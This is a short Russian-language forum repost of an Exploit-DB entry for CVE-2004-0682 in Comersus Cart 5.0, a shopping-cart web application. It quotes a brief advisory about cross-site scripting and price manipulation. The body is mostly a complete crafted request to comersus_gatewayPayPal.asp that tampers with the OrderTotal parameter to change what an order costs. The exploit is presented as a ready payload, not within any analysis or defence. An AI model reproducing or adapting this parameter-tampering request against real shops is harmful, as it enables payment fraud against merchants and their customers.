Exploit Comersus Open Technologies Comersus 5.0 - 'comersus_gatewayPayPal.asp' Price Manipulation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24260
Проверка EDB
  1. Пройдено
Автор
THOMAS RYAN
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2004-0682
Дата публикации
2004-07-07
Comersus Open Technologies Comersus 5.0 - 'comersus_gatewayPayPal.asp' Price Manipulation
Код:
source: https://www.securityfocus.com/bid/10674/info

Comersus Cart is reported prone to multiple vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks and manipulate parameters to change the price of an order.

Comersus Cart version 5.09 is affected by these issues, however, other versions may be prone to these vulnerabilities as well.

http://www.example.com/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&OrderTotal=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Hat+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Millennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Want+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A
 
Источник
www.exploit-db.com

Похожие темы